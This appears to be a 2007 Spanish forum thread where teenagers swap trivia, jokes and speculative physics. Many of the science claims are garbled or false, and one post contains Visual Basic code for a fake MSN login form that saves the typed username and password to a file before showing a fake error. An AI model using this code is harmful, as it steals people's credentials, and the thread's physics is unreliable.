PDA

Ver la versión completa : Vean Interesante ^^



SteveShang
10/05/2007, 20:43
weno esto es para pasar el tiempo ^^ .... miren , la cosa es asi , este post lo armo para q algunos como sabran no son escuchados cuando dicen algo por lo que generalmente son destacados y no los escuchan nadie o solamente los escuchan sus compañeros de clase o en casa ... weno sea como sea la situación este post es libre para poder "moderadamente" hablar sobre este tema ^^ Empezando por mi ...
Sabiendo q la perra da perritos , q dan los gatos ? ... los gatos dan hijos q se crian en un ambiente generalmente weno, pero no llegan a ser gatos hasta la edad de 14 o 15 años. Y cuando van creciendo van conociendo palabras groseras de parte de su padre... mas adelante piya la costumbre de su padre, "ROBAR" por lo cual lo denominamos GATO.

PennyLane
10/05/2007, 20:53
Claro...es por eso que Pitagoras dijo que en un triangulo rectangulo el cuadrado de la hipotenusa es igual a la suma de los catetos, y nadie se animo a contradecirlo.

feedback
10/05/2007, 21:00
todo cuerpo q se sumerge en un liquido experimenta un empuje de abajo hacia arriva igual al peso del liquido desalojado, eurekaaa!!!!

la raiz cuadrada de dos: 1,414213562.....

(ambos sacados de les luthiers, mmm almenos aprendi algo) xD

Magick
10/05/2007, 21:14
Segun la fisica cuentica es posible demostrar cualquier cosa, ya ueq todo seria posible. Esto se basa en una simple teoria: para ver un atomo tenemos uqe aplicarle luz, pero al aplicarle esa luz los fotones chocan con el atomo, osea, con solo mirar un atomo no estariamos modificando. Por lo tento seria imposible predecir el futuro ( osea, en este instante se puede abrir un agujero negro en el piso, qeu te chupe y salir ileso 5 minutos despues cantando "y dale a tu cuerdo alegria macarena"). Por ende, habria multiples realidades (principio de insertudumbre), que se van "descartanto" ( en realidad son paralelas ) a medida uqe pasa el tiempo.

Pd: buena idea

Saludos

Zagarth
10/05/2007, 21:15
Bue, no entendí un soto.

Corrección:

Pitágoras dijo que en un triangulo rectángulo, la hipotenusa es igual a la suma de LOS CUADRADOS de los catetos.

QUE NERD QUE SOY :afro:

Magick
10/05/2007, 21:16
Bue, no entendí un soto.

Corrección:

Pitágoras dijo que en un triangulo rectángulo, la hipotenusa es igual a la suma de LOS CUADRADOS de los catetos.

QUE NERD QUE SOY :afro:

En realidad no lo dijo pitagoras, lo dijo su escuela, y no se llama teorema de pitagoras, se llama teorema de la hipotenusa.

Saludos

PennyLane
10/05/2007, 21:17
Bue, no entendí un soto.

Corrección:

Pitágoras dijo que en un triangulo rectángulo, la hipotenusa es igual a la suma de LOS CUADRADOS de los catetos.

QUE NERD QUE SOY :afro:

My mistake :D

dariodea
10/05/2007, 21:31
Los colores son una ilusion optica creada por el cerebro. Por eso NADIE ve los mismos colores, por ejemplo, lo que es para mi azul, para vos es otro azul, un poquitiiiiito mas claro o mas oscuto.=)

Zagarth
10/05/2007, 21:31
En realidad no lo dijo pitagoras, lo dijo su escuela, y no se llama teorema de pitagoras, se llama teorema de la hipotenusa.

Saludos

Todas mis profesoras de matemáticas son unas ********s entonces? :jawdrop:



:afro:

Magick
10/05/2007, 21:34
Todas mis profesoras de matemáticas son unas ********s entonces? :jawdrop:



:afro:

No es uqe sean unos ****licos, sino que vos por ejemplo decis chicle en vez de bola de mascar. Osea, es un simple detalle.

Saludos

Zagarth
10/05/2007, 21:34
Los colores son una ilusion optica creada por el cerebro. Por eso NADIE ve los mismos colores, por ejemplo, lo que es para mi azul, para vos es otro azul, un poquitiiiiito mas claro o mas oscuto.=)

Yo creí que era una variante en la percepción humana que varia según la persona.

O sea que nosotros percibimos los colores y en realidad no existen?


No es uqe sean unos ****licos, sino que vos por ejemplo decis chicle en vez de bola de mascar. Osea, es un simple detalle.

Saludos

GOMA DE MASCAR :wiggle:

Me vuelvo irritable.

PennyLane
10/05/2007, 21:36
Los colores son una ilusion optica creada por el cerebro. Por eso NADIE ve los mismos colores, por ejemplo, lo que es para mi azul, para vos es otro azul, un poquitiiiiito mas claro o mas oscuto.=)


Dario eso es porq sos daltonico XDDDD


GOMA DE MASCAR

Me vuelvo irritable.

El nombre original es manilkara zapota. Ya que nos ponemos detallistas...... =)

Zagarth
10/05/2007, 21:38
Se que hay diferencias en la percepción, eso es obvio que varia según la persona, pero de eso a ilusión óptica...

<<<<Cedric>>>>
10/05/2007, 21:41
ley de ohm ....
La intensidad que circula por un circuito es proporcional intensidad e inversamente proporcional a la resistencia ...
osea
I=E/R

ley de kirchoff

la sama de la caidas de tencion de cada rasistecia es igual a la caida de tension total del circuito

U=U1+U2+U....

ley de newton

1ra no puedes tocar sin ser tocado

2da.. la matoria de las fuerzas de un objeto es igual a su masa por su aceleracion

bueh basta ..

PD: como ven .. voy a una escuela tecnica ... Otto Krause! =)

Magick
10/05/2007, 21:43
El nombre original es manilkara zapota. Ya que nos ponemos detallistas...... =)


Ese es el nombre de una plata que produce lo uqe antiguamente se mascaba, yo hablo de la goma de mascar comercial ( creo que no hace falta uqe de marcas).

Saludos

dariodea
10/05/2007, 21:46
Se que hay diferencias en la percepción, eso es obvio que varia según la persona, pero de eso a ilusión óptica...

Fijate y buscalo, busca la definicon de ilusion optica... y fijate por que los perros ven en blanco y negro... Los colores lo crea el cerebro como una ilusion optica...

Saben por que los perros no pueden ver tele y ven que la luz de nuestras lamparitas parpadean? Facil, las lamparitas se mantienen incandecentes ( para nuestra vista), pero en realidad titilan, por que la frecuencia de una onda electrica es de 50 hertz a -50, por eso, cuando hace el cambio de onda, el filamento se prende y apaga, pero los eprros al tener una persistencia retiniana mas chica, por lo que hace ver ese cambio de frecuencia, lo msimo con los televisores, ellos ven todo como con llovizna y todo rapido, por que su rapidez para "captar" la imagen es ams rapida que la nuestra

PennyLane
10/05/2007, 21:47
Ese es el nombre de una plata que produce lo uqe antiguamente se mascaba, yo hablo de la goma de mascar comercial ( creo que no hace falta uqe de marcas).

Saludos


La manilkara zapota es una macromolecula que proviene de la sabia del arbol, y es sinonimo de goma de mascar.

Really.

<<<<Cedric>>>>
10/05/2007, 21:48
Fijate y buscalo, busca la definicon de ilusion optica... y fijate por que los perros ven en blanco y negro... Los colores lo crea el cerebro como una ilusion optica...

Saben por que los perros no pueden ver tele y ven que la luz de nuestras lamparitas parpadean? Facil, las lamparitas se mantienen incandecentes ( para nuestra vista), pero en realidad titilan, por que la frecuencia de una onda electrica es de 50 hertz a -50, por eso, cuando hace el cambio de onda, el filamento se prende y apaga, pero los eprros al tener una persistencia retiniana mas chica, por lo que hace ver ese cambio de frecuencia, lo msimo con los televisores, ellos ven todo como con llovizna y todo rapido, por que su rapidez para "captar" la imagen es ams rapida que la nuestra

entonces porq cuando filmas la tele se ve todo mal?

Zagarth
10/05/2007, 21:48
Seria como "Chicle", la primera marca de goma de mascar.

dariodea
10/05/2007, 21:50
ley de ohm ....
La intensidad que circula por un circuito es proporcional intensidad e inversamente proporcional a la resistencia ...
osea
I=E/R

ley de kirchoff

la sama de la caidas de tencion de cada rasistecia es igual a la caida de tension total del circuito

U=U1+U2+U....

ley de newton

1ra no puedes tocar sin ser tocado

2da.. la matoria de las fuerzas de un objeto es igual a su masa por su aceleracion

bueh basta ..

PD: como ven .. voy a una escuela tecnica ... Otto Krause! =)

La corriente que circula por un conductor es proporcional a la tension, e inversamente proporcional a la resistencia de dicho conductor =)

Zagarth
10/05/2007, 21:50
entonces porq cuando filmas la tele se ve todo mal?

Porque la camara digital capta mas rápido que la luz del monitor (creo)

Ya sabia eso de los perros, se bocha de cosas pero no me las acuerdo ahora...

Soy fanático de estas cosas.:afro:


La corriente que circula por un conductor es proporcional a la tension, e inversamente proporcional a la resistencia de dicho conductor =)

Yo lo iba a corregir!!!

NiSmO
10/05/2007, 21:51
el princpio de sinergia dice q la suma de las partes de un sistema es diferente del total ( osea q 4+4= 5 )

dariodea
10/05/2007, 21:51
entonces porq cuando filmas la tele se ve todo mal?
Que tiene que ver?xD, toy hablando de los perros, osea, para nosotros es normal, por que nuestra persepcion es menor a la del perro... las camaras tan hechas para personas, no para perros >.<

Magick
10/05/2007, 21:51
La manilkara zapota es una macromolecula que proviene de la sabia del arbol, y es sinonimo de goma de mascar.

Really.

SINONIMO ???

Como puede ser que la sabia de un arbol sea sinonimo de goma de mascar. Osea, si algo lo utilizamos para algo le ponemos ese nombre ??? ( ejemplo; la pelota; recibidora de golpes).

Pd: Bue, ya desvirtue todo :lol: .

Saludos

Zagarth
10/05/2007, 21:53
Nono, esta bien eso de la sabia "mepa" que esta mal.

<<<<Cedric>>>>
10/05/2007, 21:56
La corriente que circula por un conductor es proporcional a la tension, e inversamente proporcional a la resistencia de dicho conductor =)

q pifie ... puse 2 veces intensidad .. gracias xD .. no le cuenten a mi profesor de electrica!!

dariodea
10/05/2007, 21:58
Es sabido, que no se puede llegar a la velocidad de la luz, por que al seguir elevando la aceleracion del atomo, este va ganando masa y requiere mayor aceleracion para subir su vel... lo mismo pasa con el famoso 0ºKelvin, el cual no se lo logra alcanzar, por qeu el cuerpo va ganando masa y cada vez se deciende infinitamente la temp, hasta que se llega a un valor de -273ºC, y las moleculas siguen moviendose, con poquito movimiento pero se mueven. El Grado Kelvin teoricamente es -273.23ºC aprox...

PiripiPi
10/05/2007, 21:58
(B.H):2 = area de un triangulo





no me gusta el colegio

Magick
10/05/2007, 22:01
Es sabido, que no se puede llegar a la velocidad de la luz, por que al seguir elevando la aceleracion del atomo, este va ganando masa y requiere mayor aceleracion para subir su vel... lo mismo pasa con el famoso 0ºKelvin, el cual no se lo logra alcanzar, por qeu el cuerpo va ganando masa y cada vez se deciende infinitamente la temp, hasta que se llega a un valor de -273ºC, y las moleculas siguen moviendose, con poquito movimiento pero se mueven. El Grado Kelvin teoricamente es -273.23ºC aprox...

Jajaja, me hiciste acordar a unas de mis preguntas a lso profesores de fisica.

Si yo tengo un atomo y lo acelero a la velocidad de la luz y al mismo tiempo lo llevo al 0 absoluto ( se uqe no se puede, por varios motivos, pero esto es solo en teoria). ¿ que pasaria ?

Saludos

<<<<Cedric>>>>
10/05/2007, 22:05
Es sabido, que no se puede llegar a la velocidad de la luz, por que al seguir elevando la aceleracion del atomo, este va ganando masa y requiere mayor aceleracion para subir su vel... lo mismo pasa con el famoso 0ºKelvin, el cual no se lo logra alcanzar, por qeu el cuerpo va ganando masa y cada vez se deciende infinitamente la temp, hasta que se llega a un valor de -273ºC, y las moleculas siguen moviendose, con poquito movimiento pero se mueven. El Grado Kelvin teoricamente es -273.23ºC aprox...

en saint seiya hyoga lo logra .... fuera de joda ... en una universidad de yanquilandia lo hicieron se lo llama cero absoluto .... es la temperatura mas baja q se pudo llegar! si no no tiene sentido :yu:

dariodea
10/05/2007, 22:09
Jajaja, me hiciste acordar a unas de mis preguntas a lso profesores de fisica.

Si yo tengo un atomo y lo acelero a la velocidad de la luz y al mismo tiempo lo llevo al 0 absoluto ( se uqe no se puede, por varios motivos, pero esto es solo en teoria). ¿ que pasaria ?

Saludos

El tema, es que si lo aceleras, y le bajas la tem, aumentas masa tb, por lo que vas a necesitar mayor aceleracion y menos temp...
Lo que siempre fue una teoria, que tenian muchas personas, era que si llegaban a ese cero absoluto o a la vel e la luz, pasas automaticamente a otro universo O.o.
Mi teoria es, qeu si llegas al cero absoluto el cuerpo deja de moverse, los electrones tarian quietas, por ende el cuerpo desapareceria, ( acuerdense que el mayor porsentaje de un atomo es espacio vacio, que el eletro a moverse muy rapido, "estaria" en todos los puntos de ese atomo), entonces al no tener mov, ese espacio vacio no se ocuparia por electrones, y desapareceria o quedaria un cuerpo de infimas dimensiones...
Y la otra teoria es que si llegas a la vel de la luz, verias todo oscuro, ya que vos serias mas rapido que la luz, lo mismo pasa con el sonido al pasar la vle de este...

EDIT: me encantan estas cosas >.<

<<<<Cedric>>>>
10/05/2007, 22:10
no se en donde lei q si vas a le velocidad de la luz tu masa se exiende infinitamente xD

PennyLane
10/05/2007, 22:14
SINONIMO ???

Como puede ser que la sabia de un arbol sea sinonimo de goma de mascar. Osea, si algo lo utilizamos para algo le ponemos ese nombre ??? ( ejemplo; la pelota; recibidora de golpes).

Pd: Bue, ya desvirtue todo :lol: .

Saludos

http://es.wikipedia.org/wiki/Chicle

Yes.

Magick
10/05/2007, 22:14
El tema, es que si lo aceleras, y le bajas la tem, aumentas masa tb, por lo que vas a necesitar mayor aceleracion y menos temp...
Lo que siempre fue una teoria, que tenian muchas personas, era que si llegaban a ese cero absoluto o a la vel e la luz, pasas automaticamente a otro universo O.o.
Mi teoria es, qeu si llegas al cero absoluto el cuerpo deja de moverse, los electrones tarian quietas, por ende el cuerpo desapareceria, ( acuerdense que el mayor porsentaje de un atomo es espacio vacio, que el eletro a moverse muy rapido, "estaria" en todos los puntos de ese atomo), entonces al no tener mov, ese espacio vacio no se ocuparia por electrones, y desapareceria o quedaria un cuerpo de infimas dimensiones...
Y la otra teoria es que si llegas a la vel de la luz, verias todo oscuro, ya que vos serias mas rapido que la luz, lo mismo pasa con el sonido al pasar la vle de este...

EDIT: me encantan estas cosas >.<

Al cero absoluto no se puede llegar por que la masa de un ente se consentraria en un solo punto y su densidad seria infinita.

A la velocidad de la luz no se podria viajar por que tu maza seria infinita.

Osea, tambie nme parece valido que si los 2 fenomenos ocurren al mismo tiempo se anularian mutuamente, por lo tanto nunca sucederian ( jejeje, esto ya paso de fisica convencional a cuantica )

Pd: A mi tambien me encantan :mfr_lol: .

Saludos

Magick
10/05/2007, 22:18
http://es.wikipedia.org/wiki/Chicle

Yes.

Aaaa, no sabia, que Chicle tambien llamaban al arbol.

Gracias por la informacion y por ser tan paciente.

Saludos

<<<<Cedric>>>>
10/05/2007, 22:20
Al cero absoluto no se puede llegar por que la masa de un ente se consentraria en un solo punto y su densidad seria infinita.

A la velocidad de la luz no se podria viajar por que tu maza seria infinita.

Osea, tambie nme parece valido que si los 2 fenomenos ocurren al mismo tiempo se anularian mutuamente, por lo tanto nunca sucederian ( jejeje, esto ya paso de fisica convencional a cuantica )

Pd: A mi tambien me encantan :mfr_lol: .

Saludos

dijiste casi exacto lo q dije yo :mf_swordfight:

Magick
10/05/2007, 22:24
dijiste casi exacto lo q dije yo :mf_swordfight:

Donde, busque pero no encontre lo uqe dijiste. Igual, puede ser, te pido perdon por las dudas, jejeje.

Saludos

leayoo
11/05/2007, 09:54
sabian que si se meten la mano en la cola mientas tan cagando y dsps se la ponen en la cara se manchan????
PD: muy buena info lastima que no entiendo un mondongo:S

Zagarth
11/05/2007, 11:09
sabian que si se meten la mano en la cola mientas tan cagando y dsps se la ponen en la cara se manchan????
PD: muy buena info lastima que no entiendo un mondongo:S

CHANCHO:mfr_lol:

Si lo lees un par de veces entendes :afro:

freedom
11/05/2007, 17:43
Al cero absoluto no se puede llegar por que la masa de un ente se consentraria en un solo punto y su densidad seria infinita.

A la velocidad de la luz no se podria viajar por que tu maza seria infinita.

Osea, tambie nme parece valido que si los 2 fenomenos ocurren al mismo tiempo se anularian mutuamente, por lo tanto nunca sucederian ( jejeje, esto ya paso de fisica convencional a cuantica )

Pd: A mi tambien me encantan :mfr_lol: .

Saludos
Bue, si desaceleras al 0 absoluto para mi que realizarias un "viaje en el tiempo y espacio", ya que por la misma inercia del movimiento, el cuerpo tenderia a avanzar, y al no poder, se encontraria en una posicion en la cual la masa se veria aumentada en un volumen muy elevado (no se si infinito), y al esta ya no moverse absolutamente como que se veria paralizado el tiempo para el objeto en cuestion, posiblemente redireccionandose a otro lugar, no por el movimiento del objeto, sino por el de todos los demas.

En definitiva, quedarias en otro dimension/universo paralelo, para mi al menos.

Otra opcion es que haya una colision interna masiva, teninedo una capacidad destructiva inimaginable, o sea que le kbe a la galaxia. (masa aumenta hasta punto critico en la cual implosiona)

Otra opcion es que no pase nada y que simplemente el chavon vea y diga: "uhhhh, que locooooO!!!!!, demos otra vuelta!!!!!!!!!"

Suerte en la vida

StratoCharly
11/05/2007, 17:57
Ñoños :P


copado esto, yo sabia giladas, pero bueno.. , SABIA ^^

Zagarth
11/05/2007, 18:55
Bue, si desaceleras al 0 absoluto para mi que realizarias un "viaje en el tiempo y espacio", ya que por la misma inercia del movimiento, el cuerpo tenderia a avanzar, y al no poder, se encontraria en una posicion en la cual la masa se veria aumentada en un volumen muy elevado (no se si infinito), y al esta ya no moverse absolutamente como que se veria paralizado el tiempo para el objeto en cuestion, posiblemente redireccionandose a otro lugar, no por el movimiento del objeto, sino por el de todos los demas.

En definitiva, quedarias en otro dimension/universo paralelo, para mi al menos.

Otra opcion es que haya una colision interna masiva, teninedo una capacidad destructiva inimaginable, o sea que le kbe a la galaxia. (masa aumenta hasta punto critico en la cual implosiona)

Otra opcion es que no pase nada y que simplemente el chavon vea y diga: "uhhhh, que locooooO!!!!!, demos otra vuelta!!!!!!!!!"

Suerte en la vida

Yo tenia entendido que si un objeto alcanzara la velocidad de la luz (imposible, ya se) la masa, en vez de elevarse, se convierte en energía.
Y que al 0, es imposible, pero lo mas cercano a eso serían los agujeros negros, con una densidad tan grande que atraen a la luz misma creando un punto vacío en medio del espacio, de ahi agujero negro.

dariodea
11/05/2007, 19:37
Yo tenia entendido que si un objeto alcanzara la velocidad de la luz (imposible, ya se) la masa, en vez de elevarse, se convierte en energía.
Y que al 0, es imposible, pero lo mas cercano a eso serían los agujeros negros, con una densidad tan grande que atraen a la luz misma creando un punto vacío en medio del espacio, de ahi agujero negro.

Los agujeros negros, son estrellas que colapsan sobre si misma, osea, que tienen masa infinita, y un poder de atraccion infinito tb...

Sigo sosteniendo que si algun dia llegan a la vel de la luz, el que viaje a esa vel, solo veria un negro infinito, por que la luz es mas lenta que vos>.<

Zagarth
11/05/2007, 20:04
Los agujeros negros, son estrellas que colapsan sobre si misma, osea, que tienen masa infinita, y un poder de atraccion infinito tb...

Sigo sosteniendo que si algun dia llegan a la vel de la luz, el que viaje a esa vel, solo veria un negro infinito, por que la luz es mas lenta que vos>.<


1. Exacto, eso lo vi en Discovery en momentos al pedo y ratos sin mi amiga Manuela:lol:
2. O verías halos de luz, o algo así intermitente, pues verías la luz en movimiento.

P3PO
11/05/2007, 20:29
E = Mc²
Energia = Mac donal al cuadrado

NiSmO
11/05/2007, 20:33
e=mc2 significa...q la materia y la energia son las caras de las mismas monedas xD

Zagarth
12/05/2007, 01:58
e=mc2 significa...q la materia y la energia son las caras de las mismas monedas xD

NOOOO, ESTE ES EL PROXIMO PREMIO NOBEL:


E = Mc²
Energia = Mac donal al cuadrado


QUE CAPO :afro:

daron_92
12/05/2007, 02:05
jajaaj

para alcanzar el punto fijo inferior de un termometro de mercurio en la escala Farenheit, el mercurio tiene q igualar el estado termico de una mezcla frigorifica de agua y cloruro de amonio en esta de fusion


tube prueba el otro dia sino ni pedo me lo acordaba XD

SteveShang
12/05/2007, 02:23
la velocidad de la luz es = a 300.000 km/seg ^^

Zagarth
12/05/2007, 03:25
la velocidad de la luz es = a 300.000 km/seg ^^

Lo googleaste no? asi cualquiera...:sniper:

SteveShang
12/05/2007, 03:50
akakka nada q ver Noob eso lo se porque en clase nos enseñan quimica y eso entra dentro de la quimica asi q vo fijate q vas a poner "googleado"

Zagarth
12/05/2007, 13:20
akakka nada q ver Noob eso lo se porque en clase nos enseñan quimica y eso entra dentro de la quimica asi q vo fijate q vas a poner "googleado"

:puppyeyes:


We, no se me ocurren mas datos curiosos... Pero cuando los dicen, resulta que me acuerdo al toque, así que ya es cosa de no acordarse en vez de no saber lo mio.

Juro, menos esto de la velocidad de la luz (soy malo con lo especifico, me gusta la lógica) me lo sabía todo o al menos tenía una noción del planteo.

:wiggle:

dariodea
12/05/2007, 14:23
:puppyeyes:


We, no se me ocurren mas datos curiosos... Pero cuando los dicen, resulta que me acuerdo al toque, así que ya es cosa de no acordarse en vez de no saber lo mio.

Juro, menos esto de la velocidad de la luz (soy malo con lo especifico, me gusta la lógica) me lo sabía todo o al menos tenía una noción del planteo.

:wiggle:
Si vas a cole tecnico, no podes NO saber la vel de la luz, ya qu een electrotecnia, fisica, quimica, laboratoria etc nos abes la vel de la luz no aprobas XD

Zagarth
12/05/2007, 14:32
Yo voy a un colegio... FEO.

Es difícil el técnico?

BlackFire
12/05/2007, 14:33
si 70 chinos se tiran 70 pedos [das vuelta la calculadora] queda OLOL


cya -______-

dariodea
12/05/2007, 14:38
si 70 chinos se tiran 70 pedos [das vuelta la calculadora] queda OLOL


cya -______-
jajajajajajajajajjajajaajajajjajajaj que HDP, eso es viejiiiiisimo!!!...


PD: ema tengo a palaveccini este año de nuevo, le ponemos las mochilas en el pasillo para queno pase y jugamos al truco XD

XxmicaxX
12/05/2007, 15:02
la solucion de una ecuacion de segundo grado es -b +- la raiz cuadrada de b al cuadrado menos 4 por a por c, todo eso sobre 2 por a..
como se!!! jaja

SteveShang
12/05/2007, 18:49
jajaja ese estuvo wenisimo Black

freedom
12/05/2007, 19:02
Los agujeros negros, son estrellas que colapsan sobre si misma, osea, que tienen masa infinita, y un poder de atraccion infinito tb...

Sigo sosteniendo que si algun dia llegan a la vel de la luz, el que viaje a esa vel, solo veria un negro infinito, por que la luz es mas lenta que vos>.<
Como les gusta hablar del infinito!!!!!!!!!!!

Sep, los agujeros negros son estrellas grandes (soles para ser mas especificos) que debido a su extincion explotan (pasando por estado supernova), haciendo una gran fuerza de atraccion que "chupa" a todos lo que esta cerca (porque en realidad es una implosion, o sea una explosion "para adentro")

Notese que en realidad un agujero negro no se ve por si mismo, sino que se ve como se desvia la luz hacia su interior, ya que el poder de estos es tan grande que logran hasta "succionar" la luz.

En el interior de un agujero negro, la masa es muy elevada (o sea que tiene una densidad muy elevada, reducciendo todo).


Suerte en la vida

SteveShang
12/05/2007, 19:06
:o creo q me falta mucho aprender :P

luciano777
12/05/2007, 19:23
el princpio de sinergia dice q la suma de las partes de un sistema es diferente del total ( osea q 4+4= 5 )

eso fue lo unico que no entendi

ceentee
12/05/2007, 19:24
ni eso entendi, mejor me ovy apor alla ----->

Zagarth
12/05/2007, 19:30
Como les gusta hablar del infinito!!!!!!!!!!!

Sep, los agujeros negros son estrellas grandes (soles para ser mas especificos) que debido a su extincion explotan (pasando por estado supernova), haciendo una gran fuerza de atraccion que "chupa" a todos lo que esta cerca (porque en realidad es una implosion, o sea una explosion "para adentro")

Notese que en realidad un agujero negro no se ve por si mismo, sino que se ve como se desvia la luz hacia su interior, ya que el poder de estos es tan grande que logran hasta "succionar" la luz.

En el interior de un agujero negro, la masa es muy elevada (o sea que tiene una densidad muy elevada, reducciendo todo).


Suerte en la vida

Yo tambien lo dije, GRACIAS DISCOVERY CHANNEL!!

O sea, como el agujero negro es super-denso (insoportable el tipo ese jeje, que humor de mierda que tengo...) atrae incluso a la luz, o sea, WTF? SUPER PESADO!! Imaginense (o traten) algo tan pesado que cuyo peso puede desviar la luz!!

dariodea
12/05/2007, 19:59
Yo tambien lo dije, GRACIAS DISCOVERY CHANNEL!!

O sea, como el agujero negro es super-denso (insoportable el tipo ese jeje, que humor de mierda que tengo...) atrae incluso a la luz, o sea, WTF? SUPER PESADO!! Imaginense (o traten) algo tan pesado que cuyo peso puede desviar la luz!!

No es por ser pesado, es por que su centro tiene el tamaño de una cabeza de un alfiler ( como el famoso bing bang), pero con una densidad extremadamente grande, que hace que que nada salga de eso.
Los que detectan agujeros negros, dicen que todo lo que esta cerca d eun agujero negro, se ve separado en 2, y las 2 mitades separadas de su verdadera ubicacion.

freedom
12/05/2007, 22:52
No es por ser pesado, es por que su centro tiene el tamaño de una cabeza de un alfiler ( como el famoso bing bang), pero con una densidad extremadamente grande, que hace que que nada salga de eso.
Los que detectan agujeros negros, dicen que todo lo que esta cerca d eun agujero negro, se ve separado en 2, y las 2 mitades separadas de su verdadera ubicacion.
Seee, como un efecto espejoooo!!!!!

Pero lo interesante es que pueden verse 2 objetos, pero creo que ninguno se veria en su verdadera ubicacion por la distorsion de la luz (o sea la distorsion de la trayectoria de la luz).

Porque como vien saben, lo que vemos es la luz reflejada en los objetos.

Suerte en la vida

P/D: esto paso de ser un thread sobre curiosidades a ser uno de Astronomia y fisica general. ME ENCANTAAA!!!!

Zagarth
13/05/2007, 13:25
Y si... Esta bueno.
Lastima que fuera de los agujeros negros (ya sabia que estaba super comprimido al tamaño de un alfiler) no se una chaucha.

SteveShang
19/05/2007, 00:00
ajajaja es = q un atomo ... ejemplo , estamos en el aula de un colegio , todo esta ocupado por atomos y el centro del atomo es del tamaño de la cabeza de un alfiler :o

::iNoW::
19/05/2007, 00:06
ley de ohm ....
La intensidad que circula por un circuito es proporcional intensidad e inversamente proporcional a la resistencia ...
osea
I=E/R

ley de kirchoff

la sama de la caidas de tencion de cada rasistecia es igual a la caida de tension total del circuito

U=U1+U2+U....

ley de newton

1ra no puedes tocar sin ser tocado

2da.. la matoria de las fuerzas de un objeto es igual a su masa por su aceleracion

bueh basta ..

PD: como ven .. voy a una escuela tecnica ... Otto Krause! =)

dadadadadadadadadadadaa kirchof y newton eran geis asi me dijo mi profesor de teoria de los circuitos en la secundaria.... Leyes de merda como me hicieron sufrir y putear pero bueno, son verdad y una ves q las conoces sos el dio electronico :)

Zagarth
19/05/2007, 00:23
si 70 chinos se tiran 70 pedos [das vuelta la calculadora] queda OLOL


cya -______-

Hoy me hicieron esa joda...

Que boludez.

Zirnof
19/05/2007, 00:39
MI PERRA SE LLAMA LOLA (?)



naaa mentira.. emmm
que puedo postear.. copado.. y que sea curioso...


Generar un MS-DOS
-----------------
hacer un archivo de texto
ponerle cmd.exe
guardar como todo tipo de archivo y ponerle *.cmd
===============
Mi Keylogger para msn hecho con VisualBasic para el msn de casa :P

Option Explicit
Dim I, O As Integer
Dim Error As String

Private Sub cmdAceptar_Click()
I = FreeFile
Open "D:\Juan y asociados\Visual Basic\Keylogger\Clave.txt" For Output As #I
Print #I, Txtusua & " " & txtPass
Close #I
Error = MsgBox("No se ha podido iniciar sesion debido a un error en la conexion. Intentelo de nuevo", vbCritical, "")
O = Shell("C:\Archivos de programa\MSN Messenger\msnmsgr.exe", vbMaximizedFocus)

End Sub

Private Sub cmdCancelar_Click()
Unload Me
End Sub




Último momento: Gemelo suicida mata hermano por error.

Bestia23
19/05/2007, 00:46
Freud decia q Marxs era un enfermo, mas enfermo sos vos Freud q con el complejo de edipo, inventaste una forma de serruchar con tu madre!

SteveShang
19/05/2007, 03:10
es un trabalenguas (?) reitero , si la luna fuera verde , el moco seria un lucero ??? wtf ???? xD

Zirnof
19/05/2007, 03:11
Tus ojos son 2 luceros que iluminan mi camino.. Te quedaste ciega.. Me hice mierda con un Pino..


Soy un BOT (?)...

Deje su mensaje despues del tono... TUUU TUUU TUUUU...

SteveShang
19/05/2007, 03:15
:o kakakak BOT (?) :o

<<<<Cedric>>>>
19/05/2007, 03:17
Tus ojos son 2 luceros que iluminan mi camino.. Te quedaste ciega.. Me hice mierda con un Pino..


Soy un BOT (?)...

Deje su mensaje despues del tono... TUUU TUUU TUUUU...

ahhh vo' so' una araña de google?

SteveShang
19/05/2007, 04:40
:O kakaka y cedric de donde aparecio ? :P , inventate algo

Zagarth
19/05/2007, 10:23
Mi papa...
ES PELADO

QUE INTERESANTE :dots:

SteveShang
19/05/2007, 22:00
muajajajaj.... recien estaba leyendo una carta ... miren leanla :
Una carta de una madre a su hija.
Querida hija: Estoy escribiendo lentamente porque yo sé que tú no puedes leer rápido, si recibes esta carta es porque te llegó, si no avísame y te la mando de nuevo.
Nosotros no vivimos donde vivíamos cuando tú te fuiste de casa. Tu padre leyó en el periódico que la mayoría de accidentes ocurren dentro de un radio de 30 kilómetros de la casa, por lo que nos mudamos, por cierto si ves a tu hermano decile que venga a la casa, si no lo ves no le digas nada.
Yo no puedo enviarte la dirección, debido a que la última familia que vivió aquí tomó el número de la casa cuando se marcharon, para no tener que cambiar su dirección. Este lugar es realmente maravilloso. Aun tiene una máquina lavadora, no estoy segura si funciona bien, hace una semana la llene de ropa, le di a la palanca y desde entonces no he vuelto a ver la ropa.
El clima no es muy malo aquí, solo llovió dos veces la última semana; la primera vez llovió por tres días y la segunda vez por cuatro días.
La chaqueta que tú querías que te enviara, tu tío Paco dijo que sería un poco pesada para enviarla por correo con los botones; entonces, le cortamos los botones y los metimos en uno de los bolsillos.
Recibimos otra cuenta de la funeraria, ellos dicen que si no hacemos el último pago de la lápida de abuela, la levantarán.
Ayer Venancio cerró su automóvil con las llaves dentro, estuvimos muy preocupadas porque le tomó como dos horas para sacarnos a mí y a Pilarica de adentro del auto.
Tu hermana se casó con su marido y tuvo un bebé esta mañana, pero aun no sé que sexo es, por lo que no sé si eres una tía o un tío. Si el bebé es una niña, tu hermana va a nombrarla como yo; ella la llamará Mamá.
Tío Pedro cayó en un barril de aguardiente la semana pasada, algunos hombres trataron de sacarlo, pero él se resistió a que lo sacaran hasta que se ahogó; lo cremamos y estuvo ardiendo por tres días.
Tres amigos tuyos se cayeron del puente en una camioneta, José iba conduciendo, él bajó el cristal de la puerta, escapó por allí y nadó hasta un lugar seguro. Tus otros dos amigos iban atrás, ellos se ahogaron porque no pudieron bajar la puerta trasera de la camioneta.
Ya podemos beber refresco pues los fabricantes tuvieron una gran idea, al fin pusieron ABRIR AQUÍ.
Tu perro Púas ha estado persiguiendo a un carro durante toda la semana pero lo raro es que el carro está aparcado.
No hay más nuevas noticias en estos tiempos, no ha pasado mucho.
Con amor, Mamá
PD - Iba a enviarte unas pesetas, pero el sobre ya estaba cerrado.

ceentee
19/05/2007, 22:10
jajajajaj

ya lo conocia

gonza25
19/05/2007, 22:35
Mi teoria es q si viajaras a la velocidad de la luz en la tierra (oxigeno) te prenderias fuego por la friccion del aire contra tu cuerpo ocasianaria q o te prendas fuego o te desintegres por la presion q esta ejerce.


Y mi segunda teoria en el universo es q si podriamos bajar a la velocidad de la luz nuestro cuerpo se transformaria en energia para q no haya friccion de ningun tipo y puedas llegar a semejante velocidad.

Akira
20/05/2007, 13:24
